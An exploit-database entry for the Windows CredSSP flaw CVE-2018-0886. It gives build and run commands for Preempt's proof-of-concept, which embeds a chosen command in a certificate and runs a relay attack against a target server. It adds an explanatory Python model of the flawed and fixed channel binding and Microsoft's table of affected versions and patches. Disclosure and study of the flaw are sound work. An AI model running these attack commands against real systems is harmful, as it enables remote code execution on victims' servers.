Microsoft CredSSP CVE-2018-0886 Remote Code Execution Exploit

Authors: Preempt    Risk: Critical

CVE: CVE-2018-0886    0day: Remote Code Execution

Exploit-id: Exploit-00886    Date: 2018-04-14

Introduction

The Credential Security Support Provider protocol (CredSSP) in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016, and Windows Server, version 1709 allows a remote code execution vulnerability due to how CredSSP validates requests during the authentication process, aka "CredSSP Remote Code Execution Vulnerability".

Exploit

# credssp
 
This is PoC code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project (https://github.com/preempt/rdpy), which also adds CredSSP relay support.
 
 
Written by Eyal Karni, Preempt 
ekarni@preempt.com 
 
# Build
 
## Instructions (Linux)
Tested on Ubuntu 16.04. If you are using Ubuntu 14, check the install file first.
 
```
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
```
 
* It assumes a fairly clean initial state. Best to first uninstall relevant components such as cryptography and pyopenssl (pip uninstall cryptography).
* A different version of OpenSSL needs to be installed for this to run; the install script takes care of that.
* Please follow the instructions in the order given.

EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44453.zip
# Running the exploit

Export a certificate suitable for Server Authentication from any domain.

To generate the certificate and private key for the command (CMD) to execute:

```
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
```

(exploitc.pem and exploitk.pem are the generated certificate and private key, respectively.)

To run the attack script against the target:

```
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
```

More details are in the usage section of each script (--help).
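The attack script above works because of how the pre-fix CredSSP channel binding was built: the client proves it is talking over the right TLS session by wrapping the raw SubjectPublicKey bytes of the certificate it was shown under the Kerberos/NTLM session key (the pubKeyAuth field in MS-CSSP), and the server answers with the same bytes, first byte incremented by one. A man-in-the-middle that terminates TLS with its own certificate therefore receives a wrap token over bytes it chose. The fixed protocol wraps a SHA-256 over a fixed magic string, a 32-byte nonce the client draws itself and the public key instead, so the wrapped data is no longer attacker-chosen. The following is an added illustration of that difference, not code from the original page, the Preempt PoC or rdpy; HMAC-SHA256 stands in for GSS_WrapEx, and the session key and public key bytes are constructed.

```python
"""Added illustration of the CredSSP pubKeyAuth binding before and after the
CVE-2018-0886 fix.  Not code from the Preempt PoC or from rdpy.  HMAC-SHA256
under a shared session key stands in for GSS_WrapEx, which in the real protocol
seals the data under the Kerberos or NTLM session key from the SPNEGO step."""
import hashlib
import hmac
import os

# Hash prefixes defined in MS-CSSP for the nonce-bound variant (each ends in a NUL).
CLIENT_SERVER_MAGIC = b"CredSSP Client-To-Server Binding Hash\x00"
SERVER_CLIENT_MAGIC = b"CredSSP Server-To-Client Binding Hash\x00"


def gss_wrap(session_key: bytes, data: bytes) -> bytes:
    """Stand-in for GSS_WrapEx (assumption): a keyed tag over data."""
    return hmac.new(session_key, data, hashlib.sha256).digest()


def gss_verify(session_key: bytes, data: bytes, token: bytes) -> bool:
    return hmac.compare_digest(gss_wrap(session_key, data), token)


def bump_first_byte(pubkey: bytes) -> bytes:
    """Server-side transform of the legacy binding: first byte + 1."""
    return bytes([(pubkey[0] + 1) & 0xFF]) + pubkey[1:]


# Binding as used before the fix: the client wraps the raw SubjectPublicKey
# bytes of the TLS certificate it was shown; the server echoes them bumped.
def legacy_client_pubkeyauth(session_key: bytes, server_pubkey: bytes) -> bytes:
    return gss_wrap(session_key, server_pubkey)


def legacy_server_pubkeyauth(session_key: bytes, server_pubkey: bytes) -> bytes:
    return gss_wrap(session_key, bump_first_byte(server_pubkey))


def legacy_client_checks_server(session_key: bytes, server_pubkey: bytes, token: bytes) -> bool:
    return gss_verify(session_key, bump_first_byte(server_pubkey), token)


# Binding after the fix: what gets wrapped is a SHA-256 over a fixed magic
# string, a nonce the client draws itself, and the public key.
def bound_client_pubkeyauth(session_key: bytes, client_nonce: bytes, server_pubkey: bytes) -> bytes:
    digest = hashlib.sha256(CLIENT_SERVER_MAGIC + client_nonce + server_pubkey).digest()
    return gss_wrap(session_key, digest)


def bound_server_pubkeyauth(session_key: bytes, client_nonce: bytes, server_pubkey: bytes) -> bytes:
    digest = hashlib.sha256(SERVER_CLIENT_MAGIC + client_nonce + server_pubkey).digest()
    return gss_wrap(session_key, digest)


def attacker_gets_token_over(session_key: bytes, chosen_bytes: bytes, client_nonce: bytes = None) -> bool:
    """Model the man-in-the-middle position: the attacker terminates TLS with
    its own certificate, so the SubjectPublicKey the client wraps is whatever
    bytes the attacker put in that certificate.  Returns True when the token
    the client emits is a valid wrap of exactly those chosen bytes, which is
    the property the exploit relies on."""
    if client_nonce is None:
        token = legacy_client_pubkeyauth(session_key, chosen_bytes)
    else:
        token = bound_client_pubkeyauth(session_key, client_nonce, chosen_bytes)
    return gss_verify(session_key, chosen_bytes, token)


if __name__ == "__main__":
    # Constructed values: a fake session key and fake DER public key bytes
    # that the attacker chose when building its certificate.
    key = hashlib.sha256(b"constructed session key").digest()
    chosen = b"\x30\x82\x01\x0a" + b"\x41" * 32
    print("legacy binding, token covers attacker-chosen bytes:",
          attacker_gets_token_over(key, chosen))
    print("nonce-bound binding, token covers attacker-chosen bytes:",
          attacker_gets_token_over(key, chosen, os.urandom(32)))
```

Running the block prints True for the legacy binding and False for the nonce-bound one: in both cases the attacker still picks the public key, but only in the legacy form is the wrapped data itself under its control.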

Exploitability Assessment

The following table provides an exploitability assessment for this vulnerability at the time of original publication.

| Publicly Disclosed | Exploited | Latest Software Release | Older Software Release | Denial of Service |
|---|---|---|---|---|
| No | No | 2 – Exploitation Less Likely | 2 – Exploitation Less Likely | Not Applicable |

Affected Products

The following software versions or editions are affected. Versions or editions that are not listed are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, see the Microsoft Support Lifecycle.

Impact is Remote Code Execution and Severity is Important for every entry below. Where a product has both a Monthly Rollup and a Security Only package, both article numbers are listed.

| Product | Article | Download | Supersedence |
|---|---|---|---|
| Windows 10 for 32-bit Systems | 4088786 | Security Update | 4074596 |
| Windows 10 for x64-based Systems | 4088786 | Security Update | 4074596 |
| Windows 10 Version 1511 for 32-bit Systems | 4088779 | Security Update | 4074591 |
| Windows 10 Version 1511 for x64-based Systems | 4088779 | Security Update | 4074591 |
| Windows 10 Version 1607 for 32-bit Systems | 4088787 | Security Update | 4074590 |
| Windows 10 Version 1607 for x64-based Systems | 4088787 | Security Update | 4074590 |
| Windows 10 Version 1703 for 32-bit Systems | 4088782 | Security Update | 4074592 |
| Windows 10 Version 1703 for x64-based Systems | 4088782 | Security Update | 4074592 |
| Windows 10 Version 1709 for 32-bit Systems | 4088776 | Security Update | 4074588 |
| Windows 10 Version 1709 for x64-based Systems | 4088776 | Security Update | 4074588 |
| Windows 7 for 32-bit Systems Service Pack 1 | 4088875 / 4088878 | Monthly Rollup / Security Only | 4074598 |
| Windows 7 for x64-based Systems Service Pack 1 | 4088875 / 4088878 | Monthly Rollup / Security Only | 4074598 |
| Windows 8.1 for 32-bit systems | 4088876 / 4088879 | Monthly Rollup / Security Only | 4074594 |
| Windows 8.1 for x64-based systems | 4088876 / 4088879 | Monthly Rollup / Security Only | 4074594 |
| Windows RT 8.1 | 4088876 | Monthly Rollup | 4074594 |
| Windows Server 2008 for 32-bit Systems Service Pack 2 | 4056564 | Security Update | 4056448 |
| Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) | 4056564 | Security Update | 4056448 |
| Windows Server 2008 for Itanium-Based Systems Service Pack 2 | 4056564 | Security Update | 4056448 |
| Windows Server 2008 for x64-based Systems Service Pack 2 | 4056564 | Security Update | 4056448 |
| Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) | 4056564 | Security Update | 4056448 |
| Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 | 4088875 / 4088878 | Monthly Rollup / Security Only | 4074598 |
| Windows Server 2008 R2 for x64-based Systems Service Pack 1 | 4088875 / 4088878 | Monthly Rollup / Security Only | 4074598 |
| Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) | 4088875 / 4088878 | Monthly Rollup / Security Only | 4074598 |
| Windows Server 2012 | 4088877 / 4088880 | Monthly Rollup / Security Only | 4074593 |
| Windows Server 2012 (Server Core installation) | 4088877 / 4088880 | Monthly Rollup / Security Only | 4074593 |
| Windows Server 2012 R2 | 4088876 / 4088879 | Monthly Rollup / Security Only | 4074594 |
| Windows Server 2012 R2 (Server Core installation) | 4088876 / 4088879 | Monthly Rollup / Security Only | 4074594 |
| Windows Server 2016 | 4088787 | Security Update | 4074590 |
| Windows Server 2016 (Server Core installation) | 4088787 | Security Update | 4074590 |
| Windows Server, version 1709 (Server Core Installation) | 4088776 | Security Update | 4074588 |
